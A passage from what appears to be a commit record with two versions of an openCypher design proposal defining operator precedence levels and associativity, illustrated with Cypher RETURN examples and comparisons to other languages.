slicing\n\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=NullOperatorExpression[Null predicates] (left-hand operand)\n|\n\n* Null predicate\n* Not-null predicate\n\n|9\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=UnaryAddOrSubtractExpression[Arithmetic additive inverse]\n|\n\n* Unary negative\n* Unary positive\n\n|8\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=PowerOfExpression[Exponentiation] (left-hand and right-hand operand)\n|\n\n* Exponentiation\n\n|7\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=MultiplyDivideModuloExpression[Arithmetic multiplicative operators] (left-hand and right-hand operand)\n|\n\n* Multiplication\n* Division\n* Remainder (Modulo)\n\n|6\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AddOrSubtractExpression[Arithmetic additive operators] (left-hand and right-hand operand)\n|\n\n* Addition\n* Substraction\n\n|5\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ComparisonExpression[Comparison operators] (left-hand and right-hand operand)\n|\n\n* Equal\n* Unequal\n* Greater\n* Greater or Equal\n* Less\n* Less or Equal\n\n|4\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=NotExpression[Boolean negation]\n|\n\n* Negation\n\n|3\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AndExpression[Boolean conjunction] (left-hand and right-hand operand)\n|\n\n* Conjunction\n\n|2\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=XorExpression[Boolean exclusive disjunction] (left-hand and right-hand operand)\n|\n\n* Exclusive disjunction\n\n|1\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=OrExpression[Boolean inclusive disjunction] (left-hand and right-hand operand)\n|\n\n* Inclusive disjunction\n\n|===\n\n[IMPORTANT]\n.Rule of precedence levels\n====\nOperators on level _X_ take precedence over any operator on level _Y_, when _X_ > _Y_, i.e. are of higher precedence.\nOperators can only directly accept operators of higher precedence as operands.\n====\n\nThe rule of precedence levels is enforced by the grammar.\n\nThe rule of precedence levels does not apply to all operands, though.\nThe table points out to which operands (left-hand or left-hand and right-hand) the rule of precedence levels apply.\n\nIf an operator has operands to which the precedence levels do not apply, these operands are syntactically delineate such that there is no ambiguity with regard to the operator tree.\nFor instance, the syntax of the list element access clearly delineates the list element index operand by brackets, e.g. `myList[5]`.\nSuch clearly delineated operands grammatically allow an expression of any precedence level, i.e. grammar encodes the operand as https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Expression[<Expression>].\n\nA prominent expression with a clearly delineated operand is the _parenthesized expression_.\nThe parenthesized expression has a single operand delineated by parentheses, i.e. `( n.prop+6 )` where `n.prop+6` is the delineated operand.\nThe parenthesized expression has no other purpose than grammatically allowing expressions as operands that do not meet the rule of precedence levels.\nFor instance, an arithmetic addition cannot be directly an operand to an arithmetic multiplication by the rule of precedence levels, since addition is of lower precedence than multiplication.\nHowever, with the help of a parenthesized expression, the user can denote\n----\n(3+2)*4\n----\nas a valid expression.\nThis achieves the desire operator tree\n----\n *\n \/ \\\n ( ) 4\n |\n +\n \/ \\\n3 2\n----\nwhere the arithmetic addition is an operand to the arithmetic multiplication and, hence, results in `20` (rather than `11`).\n\n=== Operator associativity\n\nMost precedence level include multiple operators.\n\nOn some levels these operators are grammatical alternatives, e.g. for https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Atom[<Atom>s], and, hence, have unambiguous precendence.\n\nOn other levels, however, the grammar allows repetitions of such operators (chaining).\n\nFor instance, all the following are valid expressions:\n\n* `--+-5`\n* `5 + 4 + 3`\n* `5 - 4 - 3`\n* `5 - 4 + 3`\n* `5 * 4 \/ 3`\n* `5 % 4 * 3`\n* `5 > 4 >= 3`\n\nAssociativity of the operators define the operator tree unambiguously for such expressions.\n\nChains of operators fall into four categories:\n\n* _Chains of type-incompatible operators_\n* _Chains of closed unary operators_\n* _Chains of binary operators_\n* _Chains with extra semantics_\n\nEach is discussed in the following subsections, respectively.\n\n==== Chains of type-incompatible operators\nThe grammar allows chaining of some operators in https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=StringListNullOperatorExpression[String, list, and null operators], which are\n\n* not type compatible or\n* only type-compatible in one possible way,\n\nsuch that there is\n\n* no valid operator tree or\n* only one unambiguous operator tree,\n\nrespectively.\n\nFor instance, grammatically allowed operator chains without a valid operator tree are:\n\n* `'string' STARTS WITH x [1..3]`\n** `('string' STARTS WITH x) [1..3]` is invalid because list slicing does not accept a boolean as first operand\n** `'string' STARTS WITH (x[1..3])` is invalid because the prefix predicate does not accept a list as second operand\n* `foo CONTAINS 'bar' ENDS WITH x`\n** `(foo CONTAINS 'bar') ENDS WITH x` is invalid because the suffix predicate does not accept a boolean as first operand\n** `foo CONTAINS ('bar' ENDS WITH x)` is invalid because the containment predicate does not accept a boolean as second operand\n\nFor instance, grammatically allowed operator chains with only a single valid operator tree are:\n\n* `foo STARTS WITH x IS NOT NULL`\n** `(foo STARTS WITH x) IS NOT NULL` is valid because the not-null predicate accepts a boolean as first operand\n** `foo STARTS WITH (x IS NOT NULL)` is invalid because the prefix predicate does not accept a boolean as second operand\n* `foo CONTAINS 'bar' IN list`\n** `(foo CONTAINS 'bar') IN list` is valid because the list element containment predicate accepts a boolean as first operand\n** `foo CONTAINS ('bar' IN list)` is invalid because the containment predicate does not accept a boolean as second operand\n\n[IMPORTANT]\n.Chains of type-incompatible operators\n====\nChains of (partly) type-incompatible operators either\n\n* do not have a valid operator tree at all, or\n* have only one valid operator tree.\n====\n\n==== Chains of closed unary operators\nClosed unary operators that allow chaining on the same precedence level are\n\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=UnaryAddOrSubtractExpression[Arithmetic additive inverse]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=NotExpression[Boolean negation]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ListOperatorExpression[List slicing]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=NullOperatorExpression[Null predicates]\n\nExample expressions are\n\n* `--+-5`\n* `NOT NOT NOT false`\n* `list[4..17][2..5]`\n* `x IS NOT NULL IS NOT NULL IS NULL`\n\n[IMPORTANT]\n.Chaining of closed unary operators\n====\nChains of closed unary operators have an unambiguous operator tree.\n====\n\n[NOTE]\n.Associativity of unary operators\n====\nThe grammar defines if the operand of an unary operator is on the left end or on the right end of the operator's syntax.\nThis renders the operator left- or right associative, respectively.\nNevertheless, the grammar allows only one unambiguous operator tree, in both case.\n====\n\n\n==== Chains of binary operators\nBinary operators that allow chaining with themselves of other operators of compatible result type on the same precedence level are\n\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=PowerOfExpression[Exponentiation]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=MultiplyDivideModuloExpression[Multiplication]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=MultiplyDivideModuloExpression[Division]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=MultiplyDivideModuloExpression[Remainder (Modulo)]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AddOrSubtractExpression[Addition]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AddOrSubtractExpression[Substraction]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AndExpression[Boolean conjunction]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=OrExpression[Boolean inclusive disjunction]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=OrExpression[Boolean exclusive disjunction]\n\nExample expressions are\n\n* `5 * 4 * 3`\n* `5 ^ 4 ^ 3`\n* `5 \/ 4 \/ 3`\n* `5 % 4 % 3`\n* `5 % 4 * 3`\n* `5 - 4 - 3`\n* `5 - 4 + 3`\n* `5 + 4 + 3`\n* `TRUE AND FALSE AND TRUE`\n* `TRUE OR FALSE OR TRUE`\n* `TRUE XOR FALSE XOR TRUE`\n\n[IMPORTANT]\n.Chains of binary operators\n====\nIn chains of binary operators, the operator have left-to-right associativity, i.e. for every two operators, the operator appear earlier (more left) in the query string takes precedence and the operator tree is left-deep.\n====\n\n[NOTE]\n.Associative binary operators\n====\nWhere the semantics of operator is associative (e.g. addition), a right-deep operator tree produces the same result as a left-deep operator tree.\n====\n\nConsequently, the examples evaluate as follows:\n\n[cols=\"2a,1a\"]\n|====\n|\n[source, cypher]\n----\nRETURN 5 * 4 * 3 AS a,\n (5 * 4)* 3 AS b,\n 5 *(4 * 3) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!60!60!60\n!====\n\n|\n[source, cypher]\n----\nRETURN 4 ^ 3 ^ 2 AS a,\n (4 ^ 3)^ 2 AS b,\n 4 ^(3 ^ 2) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 4096.0 ! 4096.0 ! 262144.0\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 \/ 4 \/ 3 AS a,\n (5 \/ 4)\/ 3 AS b,\n 5 \/(4 \/ 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 0 ! 0 ! 5\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 % 4 % 3 AS a,\n (5 % 4)% 3 AS b,\n 5 %(4 % 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 1 ! 1 ! 0\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 % 4 * 3 AS a,\n (5 % 4)* 3 AS b,\n 5 %(4 * 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 3 ! 3 ! 5\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 - 4 - 3 AS a,\n (5 - 4)- 3 AS b,\n 5 -(4 - 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! -2 ! -2 ! 4\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 - 4 + 3 AS a,\n (5 - 4)+ 3 AS b,\n 5 -(4 + 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! b ! c\n! 4 ! 4 ! -2\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 + 4 + 3 AS a,\n (5 + 4)+ 3 AS b,\n 5 +(4 + 3) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!12!12!12\n!====\n\n|\n[source, cypher]\n----\nRETURN TRUE AND FALSE AND TRUE AS a,\n (TRUE AND FALSE) AND TRUE AS b,\n TRUE AND (FALSE AND TRUE) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!false!false!false\n!====\n\n|\n[source, cypher]\n----\nRETURN TRUE OR FALSE OR TRUE AS a,\n (TRUE OR FALSE) OR TRUE AS b,\n TRUE OR (FALSE OR TRUE) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!true!true!true\n!====\n\n|\n[source, cypher]\n----\nRETURN TRUE XOR FALSE XOR TRUE AS a,\n (TRUE XOR FALSE) XOR TRUE AS b,\n TRUE XOR (FALSE XOR TRUE) AS c\n----\n|\n[options=\"header\"]\n!====\n!a !b !c\n!false!false!false\n!====\n\n|====\n\n==== Chains with extra semantics\nOperators whose chaining gives extra semantics are\n\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ComparisonExpression[Comparison operations]\n\nExample expression are\n\n* `5 = 5 = 5`\n* `5 = 4 <> 3`\n* `5 <> 4 > 3`\n* `5 > 4 > 3`\n* `5 > 4 >= 3`\n* `5 >= 4 < 3`\n\n[IMPORTANT]\n.Chains with extra semantics\n====\nChains with extra semantics, either\n\na. form a flat operator tree of a single operator, or\nb. their semantics is defined by a syntax transformation to an expression that has an unambiguous operator tree based on the other precedence rules stated in this document.\n====\n\n[NOTE]\n.Associativity of comparison operators\n====\nBecause of the extra semantics of a chain of comparison, the comparison operators do not have any observable associativity in openCypher.\n====\n\nConsequently, the examples evaluate as follows:\n\n[cols=\"2a,1a\"]\n|====\n|\n[source, cypher]\n----\nRETURN 5 = 5 = 5 AS a,\n (5 = 5) AND (5 = 5) AS ax,\n (5 = 5)= 5 AS b,\n 5 =(5 = 5) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! true ! true ! false ! false\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 = 4 <> 3 AS a,\n (5 = 4) AND (4 <> 3) AS ax,\n (5 = 4)<> 3 AS b,\n 5 =(4 <> 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! false ! false ! true ! false\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 <> 4 > 3 AS a,\n (5 <> 4) AND (4 > 3) AS ax,\n (5 <> 4)> 3 AS b,\n 5 <>(4 > 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! true ! true ! null ! true\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 > 4 > 3 AS a,\n (5 > 4) AND (4 > 3) AS ax,\n (5 > 4)> 3 AS b,\n 5 >(4 > 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! true ! true ! null ! null\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 > 4 >= 3 AS a,\n (5 > 4) AND (4 >= 3) AS ax,\n (5 > 4)>= 3 AS b,\n 5 >(4 >= 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! true ! true ! null ! null\n!====\n\n|\n[source, cypher]\n----\nRETURN 5 <= 4 < 3 AS a,\n (5 <= 4) AND (4 < 3) AS ax,\n (5 <= 4)< 3 AS b,\n 5 <=(4 < 3) AS c\n----\n|\n[options=\"header\"]\n!====\n! a ! ax ! b ! c\n! false ! false ! null ! null\n!====\n\n|====\n\n== What others do\n\nopenCypher has grammatically all operators in one precedence level hierarchy.\nThis is similar to how precedence is defined for more programming languages.\nFor instance:\n\n* https:\/\/docs.oracle.com\/javase\/tutorial\/java\/nutsandbolts\/operators.html[Java]\n* https:\/\/docs.python.org\/3\/reference\/expressions.html#operator-precedence[Python]\n* https:\/\/en.cppreference.com\/w\/cpp\/language\/operator_precedence[C++]\n* https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/JavaScript\/Reference\/Operators\/Operator_Precedence#table[Javascript]\n\nThe precedence is similar.\nSome minor difference:\n\n* Programming languages have extra operators openCypher does not have, e.g. increment\/decrement, bitwise operators, ternary operator, and assignments\n* In Javascript exponentiation is right-to-left associative\n\nSQL encodes large parts of the type compatibility of expressions in the grammar.\nHence, its precedence hierarchy is partition by type.\nWithin one type, SQL's precedence hierarchy is similar.\n\nChainable operators, such as addition, multiplication, etc. are left-to-right associative in SQL as well.\nHowever, SQL directly encode that in the grammar, with left-recursive production rules, e.g.\n\n[source, ebnf]\n----\n<numeric value expression> ::=\n <term>\n | <numeric value expression> <plus sign> <term>\n | <numeric value expression> <minus sign> <term>\n\n<term> ::=\n <factor>\n | <term> <asterisk> <factor>\n | <term> <solidus> <factor>\n\n<factor> ::=\n [ <sign> ] <numeric primary>\n----\n\nMost program and query language do not give chains of comparison operators extra semantics.\nTypically, comparison operators are left-to-right associative.\n\n== Benefits to this proposal\n\nThis CIP clarifies the precedence rules of openCypher.\n\n== Caveats to this proposal\n\nNone known.\n\n\n","old_contents":"= CIP2021-08-10 Operator precedence\n:numbered:\n:toc:\n:toc-placement: macro\n:source-highlighter: codemirror\n\n*Authors:* Hannes Voigt <hannes.voigt@neo4j.com>\n\n\n[abstract]\n.Abstract\n--\nThis CIP defines the operator precedence rules of openCypher.\n--\n\ntoc::[]\n\n== Background\n\nThe expression sub-languages of openCypher (and most other query and programming languages) allow very liberal composition of different elementary expressions into complex expressions through nesting.\nElementary expression the kinds of expressions the expression sub-languages provides and which for the building blocks of the sub-languages.\n\nSome elementary expressions have zero operands, e.g. literals.\nMost elementary expressions have one or more operands.\nFor instance,\n\n- An arithmetic negation has one operand,\n- A boolean conjunction has two operands,\n- A property access has two operands -- an element and a property key,\n- A function call has two operands -- a function name and an arguments list,\n- A list comprehension has three or four operands -- an element variable name, a list, a predicate, and optionally a projection expression\n- A case expression has multiple operands -- a value to test, for every case a test value\/predicate and a result value, and a default value of the 'else' case\n\nSome operands expect non-values, typically identifiers (variable names, function names, property keys, etc.).\nSuch _non-value operands_ do not allow nesting of expressions because expression only result in values.\n\nHowever, most operands expect values of some types.\nSuch _value operands_ allow nesting of all expressions that result in a values of the expected type.\nThe nested expressions form an _operator tree_ and which typically evaluated bottom-up, i.e. all expressions that provide an operand are evaluated before the expression is evaluated that take this operands.\n(Higher-order expression, e.g. list comprehensions, have operands which are exceptions to this bottom-up evaluation.)\nIn other words, the operator tree encodes the evaluation order.\nFor instance, the following operator tree\n----\n *\n \/ \\\n + 4\n \/ \\\n3 2\n----\nencodes that the numeric addition is evaluated before the numeric multiplication, so that the expression results in `20`.\n\nHowever, the query string is a sequence of characters and not a tree.\nThe parser turns the query string into such an operator tree.\nIn the query string, nesting can clearly be denoted by parentheses.\nFor instance, the query string\n----\n((3+2)*4)\n----\nallows a parser to unambiguously construct the operator tree shown above.\n\nFor user convenience, better readability, and familiarity with common conventions in mathematical notation, openCypher (and most other query and programming languages) allows omitting the parentheses.\nFor instance,\n----\n3+2*4\n----\nis also a valid expression.\n\nWithout additional rules, however, it is not possible to unambiguously construct a operator tree for such an expression.\nIn the particular case, two operator trees are possible:\n\n- `((3+2)*4)`\n- `(3+(2*4))`\n\nTo avoid this kind of ambiguity, openCypher (and most other query and programming languages) has _precedence rules_.\n\nPrecedence rules (or _rules of operator precedence_) define the order in which the different operators, i.e. the different kinds of expressions, are evaluated.\nFor instance, numeric multiplication is evaluated before numeric addition, such that expression\n----\n3+2*4\n----\nis effectively evaluated as\n----\n(3+(2*4))\n----\nand, hence, results in `11` (rather than `20`).\n\nThis CIP states the precedence rules of openCypher.\n\n== Proposal\n\nThe precedence in openCypher is defined by (1) _precedence levels_ and (2) _operator associativity_.\nBoth are defined in the following two subsections.\n\n=== Precedence levels\n\nThe following <<precedenceLevels,table>> lists the precedence levels in descending order.\n\n.[[precedenceLevels]]Precedence levels\n[cols=\"<.<1a,<.<4a,<.<4a\", options=\"header\"]\n|===\n|Level |Group |Operators\n\n|12\n|Atoms\n|\n\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Literal[Literals]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Variable[Variables]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Parameter[Parameters]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=CaseExpression[Case expressions]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ListComprehension[List comprehensions]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=PatternComprehension[Pattern comprehensions]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Reduce[Reduce operator]\n* quantifiers\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=RelationshipsPattern[Pattern predicates]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ParenthesizedExpression[Function invocations]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ParenthesizedExpression[Existential subqueries]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ParenthesizedExpression[Parenthesized expression]\n\n|11\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=PropertyOrLabelsExpression[Graph element operators]\n|\n\n* property lookup\n* label expressions\n\n.3+|10\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=StringOperatorExpression[String operators] (left-hand operand)\n|\n\n* Prefix predicate (and right-hand operand)\n* Suffix predicate (and right-hand operand)\n* Contains predicate (and right-hand operand)\n* Regular expression predicate\n\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ListOperatorExpression[List operators] (left-hand operand)\n|\n\n* List element containment predicate (and right-hand operand)\n* List element access\n* List slicing\n\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=NullOperatorExpression[Null predicates] (left-hand operand)\n|\n\n* Null predicate\n* Not-null predicate\n\n|9\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=UnaryAddOrSubtractExpression[Arithmetic additive inverse]\n|\n\n* Unary negative\n* Unary positive\n\n|8\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=PowerOfExpression[Exponentiation] (left-hand and right-hand operand)\n|\n\n* Exponentiation\n\n|7\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=MultiplyDivideModuloExpression[Arithmetic multiplicative operators] (left-hand and right-hand operand)\n|\n\n* Multiplication\n* Division\n* Remainder (Modulo)\n\n|6\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AddOrSubtractExpression[Arithmetic additive operators] (left-hand and right-hand operand)\n|\n\n* Addition\n* Substraction\n\n|5\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ComparisonExpression[Comparison operators] (left-hand and right-hand operand)\n|\n\n* Equal\n* Unequal\n* Greater\n* Greater or Equal\n* Less\n* Less or Equal\n\n|4\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=NotExpression[Boolean negation]\n|\n\n* Negation\n\n|3\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=AndExpression[Boolean conjunction] (left-hand and right-hand operand)\n|\n\n* Conjunction\n\n|2\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=XorExpression[Boolean exclusive disjunction] (left-hand and right-hand operand)\n|\n\n* Exclusive disjunction\n\n|1\n|https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=OrExpression[Boolean inclusive disjunction] (left-hand and right-hand operand)\n|\n\n* Inclusive disjunction\n\n|===\n\n[IMPORTANT]\n.Rule of precedence levels\n====\nOperators on level _X_ take precedence over any operator on level _Y_, when _X_ > _Y_, i.e. are of higher precedence.\nOperators can only directly accept operators of higher precedence as operands.\n====\n\nThe rule of precedence levels is enforced by the grammar.\n\nThe rule of precedence levels does not apply to all operands, though.\nThe table points out to which operands (left-hand or left-hand and right-hand) the rule of precedence levels apply.\n\nIf an operator has operands to which the precedence levels do not apply, these operands are syntactically delineate such that there is no ambiguity with regard to the operator tree.\nFor instance, the syntax of the list element access clearly delineates the list element index operand by brackets, e.g. `myList[5]`.\nSuch clearly delineated operands grammatically allow an expression of any precedence level, i.e. grammar encodes the operand as https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Expression[<Expression>].\n\nA prominent expression with a clearly delineated operand is the _parenthesized expression_.\nThe parenthesized expression has a single operand delineated by parentheses, i.e. `( n.prop+6 )` where `n.prop+6` is the delineated operand.\nThe parenthesized expression has no other purpose than grammatically allowing expressions as operands that do not meet the rule of precedence levels.\nFor instance, an arithmetic addition cannot be directly an operand to an arithmetic multiplication by the rule of precedence levels, since addition is of lower precedence than multiplication.\nHowever, with the help of a parenthesized expression, the user can denote\n----\n3+(2*4)\n----\nas a valid expression.\nThis achieves the desire operator tree\n----\n *\n \/ \\\n ( ) 4\n |\n +\n \/ \\\n3 2\n----\nwhere the arithmetic addition is an operand to the arithmetic multiplication and, hence, results in `20` (rather than `11`).\n\n=== Operator associativity\n\nMost precedence level include multiple operators.\n\nOn some levels these operators are grammatical alternatives, e.g. for https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=Atom[<Atom>s], and, hence, have unambiguous precendence.\n\nOn other levels, however, the grammar allows repetitions of such operators (chaining).\n\nFor instance, all the following are valid expressions:\n\n* `--+-5`\n* `5 + 4 + 3`\n* `5 - 4 - 3`\n* `5 - 4 + 3`\n* `5 * 4 \/ 3`\n* `5 % 4 * 3`\n* `5 > 4 >= 3`\n\nAssociativity of the operators define the operator tree unambiguously for such expressions.\n\nChains of operators fall into four categories:\n\n* _Chains of type-incompatible operators_\n* _Chains of closed unary operators_\n* _Chains of binary operators_\n* _Chains with extra semantics_\n\nEach is discussed in the following subsections, respectively.\n\n==== Chains of type-incompatible operators\nThe grammar allows chaining of some operators in https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=StringListNullOperatorExpression[String, list, and null operators], which are\n\n* not type compatible or\n* only type-compatible in one possible way,\n\nsuch that there is\n\n* no valid operator tree or\n* only one unambiguous operator tree,\n\nrespectively.\n\nFor instance, grammatically allowed operator chains without a valid operator tree are:\n\n* `'string' STARTS WITH x [1..3]`\n** `('string' STARTS WITH x) [1..3]` is invalid because list slicing does not accept a boolean as first operand\n** `'string' STARTS WITH (x[1..3])` is invalid because the prefix predicate does not accept a list as second operand\n* `foo CONTAINS 'bar' ENDS WITH x`\n** `(foo CONTAINS 'bar') ENDS WITH x` is invalid because the suffix predicate does not accept a boolean as first operand\n** `foo CONTAINS ('bar' ENDS WITH x)` is invalid because the containment predicate does not accept a boolean as second operand\n\nFor instance, grammatically allowed operator chains with only a single valid operator tree are:\n\n* `foo STARTS WITH x IS NOT NULL`\n** `(foo STARTS WITH x) IS NOT NULL` is valid because the not-null predicate accepts a boolean as first operand\n** `foo STARTS WITH (x IS NOT NULL)` is invalid because the prefix predicate does not accept a boolean as second operand\n* `foo CONTAINS 'bar' IN list`\n** `(foo CONTAINS 'bar') IN list` is valid because the list element containment predicate accepts a boolean as first operand\n** `foo CONTAINS ('bar' IN list)` is invalid because the containment predicate does not accept a boolean as second operand\n\n[IMPORTANT]\n.Chains of type-incompatible operators\n====\nChains of (partly) type-incompatible operators either\n\n* do not have a valid operator tree at all, or\n* have only one valid operator tree.\n====\n\n==== Chains of closed unary operators\nClosed unary operators that allow chaining on the same precedence level are\n\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=UnaryAddOrSubtractExpression[Arithmetic additive inverse]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=NotExpression[Boolean negation]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=ListOperatorExpression[List slicing]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=NullOperatorExpression[Null predicates]\n\nExample expressions are\n\n* `--+-5`\n* `NOT NOT NOT false`\n* `list[4..17][2..5]`\n* `x IS NOT NULL IS NOT NULL IS NULL`\n\n[IMPORTANT]\n.Chaining of closed unary operators\n====\nChains of closed unary operators have an unambiguous operator tree.\n====\n\n[NOTE]\n.Associativity of unary operators\n====\nThe grammar defines if the operand of an unary operator is on the left end or on the right end of the operator's syntax.\nThis renders the operator left- or right associative, respectively.\nNevertheless, the grammar allows only one unambiguous operator tree, in both case.\n====\n\n\n==== Chains of binary operators\nBinary operators that allow chaining with themselves of other operators of compatible result type on the same precedence level are\n\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=PowerOfExpression[Exponentiation]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=MultiplyDivideModuloExpression[Multiplication]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=MultiplyDivideModuloExpression[Division]\n* https:\/\/raw.githack.com\/openCypher\/openCypher\/master\/tools\/grammar-production-links\/grammarLink.html?p=MultiplyDivideModuloExpression[Remainder (Modulo)]\n* 